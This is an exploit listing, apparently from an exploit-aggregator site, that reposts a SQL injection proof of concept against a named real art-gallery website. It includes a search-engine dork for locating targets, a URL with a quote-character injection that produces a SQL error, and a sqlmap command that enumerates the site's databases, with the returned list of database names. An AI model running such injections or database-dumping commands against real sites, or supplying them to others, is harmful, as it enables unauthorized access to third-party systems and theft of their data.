Advertisement






Haddad's Fine SQL Injection

CVE Category Price Severity
CVE-XXXX-XXXX CWE-89 $500 High
Author Risk Exploitation Type Date
Haddad High Remote 2019-05-30
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019050314

Below is a copy:

Haddad's Fine SQL Injection
# Exploit Title:Haddad's Fine SQL Injection
--------------------------------------------------------------------------------------------------------
# Date:29.05.2019
--------------------------------------------------------------------------------------------------------

# Dork :intitle:"Haddad's Fine Arts - Search"
--------------------------------------------------------------------------------------------------------

# Exploit Author:Cerkuday
--------------------------------------------------------------------------------------------------------

# Tested on:Windows &Kali Linux
--------------------------------------------------------------------------------------------------------

#Demo:

http://haddadsfinearts.com/search.php?id=02'
You have an error in your SQL syntax

--------------------------------------------------------------------------------------------------------


PoC 

sqlmap.py -u "http://haddadsfinearts.com/search.php?id=02" --text-only  --random-agent --dbs

[*] creativeart
[*] curatedimage
[*] giclee
[*] gicleephoto
[*] gicleestudio
[*] haddads
[*] haddadsfinearts
[*] information_schema
[*] mysql
[*] ofmaker
[*] performance_schema
[*] photo_canvas
[*] photocanvas

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum